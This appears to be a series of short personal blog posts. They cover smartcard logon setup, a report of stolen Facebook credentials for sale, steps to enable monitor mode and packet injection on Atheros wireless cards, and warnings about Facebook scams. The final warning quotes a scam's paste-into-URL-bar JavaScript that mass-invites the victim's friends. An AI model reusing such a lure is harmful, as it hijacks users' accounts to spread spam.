It’s short since I’m a little bit lazy in documenting every step (these are mainly notes for myself), but if enough people request, I’ll expand this post to include more details.

Requirements:
- Active Directory (Windows 2003 and up). You cannot have smartcard login without some sort of directory service – that defeats the purpose of PKI.
- Smart card, smart card reader, and its middleware / drivers installed wherever you will be logging into the domain.

Phases:
I. Install Certificate Services on a server that is part of the domain, configure a root CA, enable the Smartcard Logon certificate template
II. Create an GPO that auto-enrolls domain machines so that all your domain machines get a certificate & can renew them automatically. Make sure computers and all domain controllers have a certificate.
III. Logon to a domain machine, open Certificates snap-in for the current user, request new certificate, select “advanced options”, pick the CSP for your smartcard and complete the request.
IV. Test logins

Share on Facebook

Now there’s a new discovery: A Russian hacker who says he’s in New Zealand is selling the username & passwords of Facebook accounts ranging from $35 to $65, depending on how many friends each account has. He claims he has 1.5 million account credentials, 700,000 of which has already been sold.

Here’s the link to the article’s source: http://www.nzherald.co.nz/connect/news/article.cfm?c_id=1501833&objectid=10640757.

Again, please be very careful when you are using Facebook!

Share on Facebook

Spend extra time to get the WNDA3100 to work properly? Yes, it didn’t quite readily work with BT4 (and probably not with other distros running the same kernel version). After doing some searching, I found a thread on backtrack-linux.org’s forum that allows my new adapter to work, with full monitor mode & packet injection capabilities. For a matter of record & for easy searching, I’ll document the directions below.

These instructions work for any Atheros AR9170 based cards:

* Arcadyan – WN7512
* Atheros – 9170
* Atheros – TG121N
* AVM – FRITZ!WLAN USB Stick N
* AMV – FRITZ!WLAN USB Stick N 2.4
* Cace – Airpcap NX
* D-Link – DWA 160A1
* D-Link – DWA 160A2
* IO-Data – WNGDNUS2
* Netgear – WNDA3100
* Netgear – WN111 v2
* Planex – GWUS300
* Sphairon – Homelink 1202
* TP-Link – TL-WN821N v2
* Z-Com – UB81 BG
* Z-Com – UB82 ABG
* Zydas – ZD1221
* Zyxel – NWD271N

IMPORTANT: please note that the hardware revisions matter, especially for the WNDA3100 that I’m working with. The WNDA3100v2 uses a Broadcom chipset instead, which has some other issues & corresponding remedies I won’t be discussing here.

Anyways…

1.) Download the patched firmwares ar9170.fw, ar9170-1.fw, and ar9170-2.fw and place them into /lib/firmware.

2.) Download compat-wireless-2.6.32.3.tar.bz2 and untar it to your favorite location.

3.) Run the following in the terminal:
cd compat-wireless-2.6.32.3
make
make install
make unload

*If you get a “No such file or directory” error when you run make, run:
ln -s /usr/src/linux /lib/modules/2.6.30.9/build

I didn’t get the error so I didn’t run it.

4.) Add “blacklist arusb_lnx ” to the end of /etc/modprobe.d/blacklist. This will prevent the loading of the buggy/incorrect drivers and load the proper ones instead.

5.) On line 174 of /usr/sbin/airmon-ng, change “xar9170″ to “xar9170usb”. This will tell airmon from the aircrack suite to use the new drivers.

6.) Save all files and reboot.

Test it using the following:

1.) Plug in your adapter (WNDA3100 in my case) and start the networking service.
/etc/init.d/networking start

2.) Run:
airmon-ng start wlan0
Replace wlan0 with your wireless interface’s name. This will put your card into monitoring mode.

3.) Run:
aireplay-ng -9 wlan0
The -9 parameter means –test for short. This should show you some output with the APs found, whether injection was successful, etc.

Enjoy!

These new firmwares and drivers are likely to be incorporated in a newer version of the kernel, and thus later releases of *nix distros, hopefully eliminating the need for a large portion of this hack.

Share on Facebook

The theme now is that it claims to install “Profile Spy”, to help you see who’s looking at your profile, etc, but THERE IS NO SUCH THING. There’s only a few apps that really do this, but it requires your visitors also install the app, for the sake of their own privacy.

So… about 900,000 people have joined the Facebook group as of writing, and I reported it to Facebook again. We’ll see how long it takes them.

Here’s the link to the most recent scam – http://www.facebook.com/group.php?gid=209645259791 (you have to click on the “read more” link).

There was also another previous one before this one, but after the Dell one, involving “Crimson Labs” and a giveaway of iMacs.

Please! READ EVERYTHING CAREFULLY BEFORE YOU SAY YES. If anything looks suspicious or doesn’t make sense, well…

Share on Facebook

I just wanted to alert you on a new scam that is going around on Facebook. It comes in the form of an invite to a group called “Dell Laptop Giveaway (1 in 2 people win one Laptop)” at http://www.facebook.com/group.php?gid=355563360211

BEWARE! The instructions stated actually collects your entire friends list and spams them with this invite and in no way enters you into any sweepstakes. This is another classic example of a deal too good to be true. As of writing this post, about 47000 people have joined the group and likely fell for this trick.

Resolution: IGNORE the invite and help spread the word about it. Do NOT do what the instructions tell you to do.

EDIT (11:53 EST): Looks like Facebook took down that rather quickly after I reported it. But still a lesson to be learned about carefully reading what you see.

—

In depth explanation…

The stated instructions are as follows:

Hello! This is a promotional offer from Dell (www.dell.com). In order to promote our activity on Facebook we have decided to give away 1 free Laptop (value of 450 dollars). For every one person (out of two people) who promotes this group will win 1 of 3 Dell Inspiron models. In order to be eligible you will have to complete the following:

1. Click ‘Invite People to Join’
2. Paste
javascript:elms=document.getElementById(‘friends’).getElementsByTagName(‘li’);for(var fid in elms){if(typeof elms[fid] === ‘object’){fs.click(elms[fid]);}}

Into your URL bar and press enter!
3. Send invites!

Your insertion into the competition is automatic as you complete the steps above. Both winners and losers are contacted via private message if they win a free laptop.

Let’s take a look step by step.

1.) Opens the invite window with a full list of all your Facebook friends.

2.) Runs a JavaScript code to obtain a list of all your friends

3.) Tells you to send this scam out.

I have not determined which browsers & versions are affected by this exploit – just don’t do it, use your common sense.

If you have the urge to take an extra step to help silence this scam, please report it to Facebook

Share on Facebook